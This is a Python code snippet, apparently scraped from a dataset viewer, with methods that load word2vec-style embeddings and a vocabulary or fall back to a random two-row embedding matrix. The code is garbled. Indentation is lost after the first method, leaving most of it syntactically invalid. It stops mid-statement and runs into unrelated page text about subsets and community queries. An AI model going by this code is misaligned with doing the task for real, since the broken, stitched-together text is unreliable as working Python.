def _init_embeddings_and_vocab(self, embeddings_file: str, vocab_file: str,
                               embeddings_dim: int) -> Tuple[np.array, dict]:
    """Return an (embeddings, vocabulary) pair.

    Loads both from the given files when both paths are provided;
    otherwise falls back to a random 2-row embedding matrix with a
    vocabulary containing only the <PAD> and <UNK> tokens.
    """
    if embeddings_file is not None and vocab_file is not None:
        return (self._load_embeddings(embeddings_file),
                self._load_word2vec_vocabulary(vocab_file))
    logger.info("Embeddings files are not specified. Perform random initialization of embeddings...")
    random_embeddings = np.random.uniform(low=-0.2, high=0.2, size=(2, embeddings_dim))
    fallback_vocab = {'<PAD>': 0, '<UNK>': 1}
    return random_embeddings, fallback_vocab
def _load_embeddings(self, embeddings_file: str) -> np.array:
try:
embeddings = np.load(embeddings_file).T
except FileNotFoundError as e:
message = "Embeddings file doesn't exist: {}".format(e)
logger.error(message)
raise FileNotFoundError(message)
except ValueError as e:
message = "Embeddings file couldn't load: {}".format(e)
logger.error(message)
raise ValueError(message)
return embeddings
def _load_word2vec_vocabulary(self, vocab_file: str) -> dict:
vocab = {}
# Added a check to not wrap the whole "with ... as" block with try/except
if not os.path.exists(vocab_file):
message = "Vocabulary file doesn't exist"
logger.error(message)
raise FileNotFoundError(message)
with open(vocab_file, encoding="utf-8") as vfile:
unk_num = 0
for line_num, line in enumerate(vfile):
line = line.strip()
try:
cur_word, cur_num_of_occur = line.split()
except ValueError:
cur_word = "unkword_%i" % unk_num
unk_num += 1
if cur_word in vocab.keys():
cur_word = "unkword_%i" % unk_num
unk_num += 1
vocab[cur_word] = line_num
return vocab
def _add_unknown_words_to_model(self, train_data_texts: List[List[str]]):
logger.info("Adding unknown words to model...")
word_list = [w for text in train_data_texts for w in text]
word_set = set(word_list)
initial_vocab_len = len(self.vocabulary)
vocab_set = set(self.vocabulary.keys())
new_words_set = set.difference(word_set, vocab_set)
number_added_words |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.